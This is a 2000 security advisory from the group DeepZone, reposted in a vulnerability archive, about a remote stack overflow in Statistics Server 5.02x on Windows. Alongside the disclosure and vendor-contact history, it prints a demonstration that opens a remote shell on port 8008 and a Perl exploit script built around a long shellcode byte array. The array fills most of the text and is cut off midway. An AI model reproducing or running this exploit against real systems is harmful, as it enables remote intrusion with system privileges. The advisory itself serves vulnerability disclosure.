[DeepZone Advisory] Statistics Server 5.02x stack overflow (Win2k remote exploit)

2000-08-12T00:00:00
ID SECURITYVULNS:DOC:541
Type securityvulns
Reporter Securityvulns
Modified 2000-08-12T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                            Statistics Server 5.02x overflow

             Advisory Name: Statistics Server Live Stats
         Advisory Released: [00/08/10]
               Application: Web site traffic analyzer
                  Severity: local/remote user can run arbitrary
                            code with WebServer privileges
                    Status: vendor contacted
                   Authors: Nemo - nemo@deepzone.org
                            |Zan - izan@deepzone.org
                       WWW: http://www.deepzone.org
                            http://deepzone.cjb.net


    ___________________________________________________________________


    OVERVIEW

    'Statistics Server is far more than just another log analyzer. It
     analyzes Web site traffic in "Real-time" and generates "Live Stats"
     reports in an easy to use Web interface.'

    'The ability of Statistics Server to deliver Live Web statistics for
     high volume installations has made it an essential component of
     many corporate Internet and Intranet Web sites and ISP Web hosting
     installations.'

    ___________________________________________________________________

    BACKGROUND

    Statistics Server 5.02x ships with a stack overflow in its web
    component. It lets a local or remote user *run arbitrary code* inside
    the server process.

    Tests, ideas and exploits were run against the Win2k Spanish version
    and the WinNT 4.0 SP6a Spanish version.

    The web server runs as a system service in a default installation.

    ___________________________________________________________________

    DETAILS

    The web server does not handle long requests correctly: when a long
    GET request (about 2033 bytes) is made, it dies with EIP overwritten.

    This lets an attacker run arbitrary code with the web server's
    privileges (system privileges by default).


    ___________________________________________________________________

    EXPLOIT

    It spawns a remote Windows shell on port 8008. It does not kill the
    web server, so the web server keeps running while the exploit is in
    progress, and it continues to run normally afterwards.

    ex.

    $ lynx http://vulnerable.com

            Server Selection
            Please Enter Server ID _____________ GO

            ....


    $ ./ssexploit502x.pl vulnerable.com 80


            (c) Deep Zone - Statistics Server 5.02x's exploit

                    Coded by |Zan - izan@deepzone.org

         -=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-


      spawning remote shell on port 8008 ...

    HTTP/1.0 302
    Server: Statistics Server 5.0
    Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

             ...    ...     ...     ...     ...     ...     ...

    Content-Type: text/html
    Connection: Keep-Alive
    Content-Lenght: 0

    ... done.

    $ lynx http://vulnerable.com            (It continues working }:)

            Server Selection
            Please Enter Server ID _____________ GO

            ....

    $ telnet vulnerable.com 8008

     Trying vulnerable.com...
     Connected to vulnerable.com.
     Escape character is '^]'.

     Microsoft Windows 2000 [Version 5.00.2195]
     (C) Copyright 1985-1999 Microsoft Corp.

     D:\StatisticsServer>


    ___________________________________________________________________

    FIXES/PATCHES

    We contacted Statistics Server support at http://www.mediahouse.com
    six weeks ago.

    First they told us that the new release didn't contain any bof bug.
    When we sent them DoS source code they told us that the new release
    could have some problem and that it would be fixed in the next
    release, and that we would be kept up to date with fix progress.

    We weren't contacted again. Any news about mediahouse.com?

    Two days ago we emailed them again asking about patches, fixes
    and progress. We haven't had any reply.

    ___________________________________________________________________


    EXPLOIT SOURCE

    The bug was discovered by Nemo - nemo@deepzone.org while auditing a
    very important Spanish ISP (others are affected).

    The bug was exploited by |Zan - izan@deepzone.org

    The exploit works against Win2k/Statistics Server 5.02x running as a
    service.



    #!/usr/bin/perl -w
    # Statistics Server 5.02x's exploit.
    # usage: ./ssexploit502x.pl hostname port
    # 00/08/10
    # http://www.deepzone.org
    # http://deepzone.cjb.net
    # http://mareasvivas.cjb.net  (|Zan homepage)
    #
    # --|Zan <izan@deepzone.org>
    # ----------------------------------------------------------------
    #
    # This exploit works against Statistics Server 5.02x/Win2k.
    #
    # Tested with Win2k (spanish version).
    #
    # It spawns a remote winshell on 8008 port. It doesn't kill
    # webserver so webserver continues running while hack is made.
    # When hack is finished webserver will run perfectly too.
    #
    # Default installation gives us a remote shell with system
    # privileges.
    #
    # overflow discovered by
    # -- Nemo <nemo@deepzone.org>
    #
    # exploit coded by
    # -- |Zan <izan@deepzone.org>
    #
    # ----------------------------------------------------------------

    use IO::Socket;


    @crash = (
    "\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
    "\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
    "\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
    "\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
    "\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
    "\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
    "\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
    "\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
    "\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
    "\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
    "\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
    "\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
    "\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
    "\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
    "\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
    "\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
    "\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
    "\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
    "\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
    "\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
    "\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
    "\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
    "\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
    "\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
    "\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
    "\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
    "\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
    "\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
    "\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
    "\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
    "\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
    "\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
    "\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
    "\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
    "\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
    "\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
    "\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
    "\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
    "\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
    "\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
    "\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
    "\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
    "\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
    "\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
    "\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
    "\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
    "\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
    "\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
    "\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
    "\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
    "\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
    "\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
    "\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
    "\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
    "\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
    "\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
    "\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
    "\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
    "\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
    "\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
    "\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
    "\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
    "\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
    "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
    "\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
    "\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
    "\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",